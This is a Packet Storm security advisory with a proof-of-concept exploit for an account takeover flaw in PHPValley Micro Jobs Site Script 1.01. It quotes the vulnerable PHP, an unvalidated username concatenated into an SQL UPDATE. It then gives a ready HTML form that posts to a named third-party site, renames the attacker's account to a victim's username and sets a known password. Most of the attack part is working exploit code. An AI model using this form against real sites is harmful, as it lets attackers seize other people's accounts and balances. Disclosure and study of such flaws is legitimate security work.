PHPValley Micro Jobs Site Script version 1.01 allows for a logged in user to spoof another user and take over their account.
be3489717f38a732799715a5bf9d318833e3065f792e86619fa9a7f2f1b2c792Author: Jason Whelan
PacketStorm: exploitdev
Email: exploitdevj@gmail.com
Target Software: PHPValley Micro Jobs Site Script 1.01
Vendor URL: http://phpvalley.com/
Demo: http://phpvalley.com/demo
Account Takeover Vulnerability
This vulnerability allows users to edit their username, which the script
doesn't account for. Editing your username to that of a current user allows
the attacker to takeover their account, including using or depositing their
balance.
The vulnerability exists in php/change_pass_content.php:
if (isset($_POST['changepass']))
{
$cpass=md5($_POST['cpass']);
$npass=trim($_POST['npass']);
$npassc=trim($_POST['npassc']);
$username=trim(strtolower($_POST['auser']));
if($npass == $npassc && !empty($npass)){
$query = "UPDATE members SET username='".$username."',
password='".md5(strtolower($npass))."' where
username='".$_SESSION['userName']."' and password='$cpass'";
This code doesn't validate the username that is being updated. SQL
injection might also be possible, but the length is limited here.
Exploit:
<!-- be logged into your own account, edit info below: -->
<form method="post" action="http://webfiver.com/change_pass.php">
<input name="changepass" type="hidden" value="Update" />
Target Username: <input name="auser" type="text" />
Your Password: <input name="cpass" type="password" />
<input name="npass" type="hidden" value="jacked" />
<input name="npassc" type="hidden" value="jacked" />
<input type="submit" value="Jack" />
</form>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed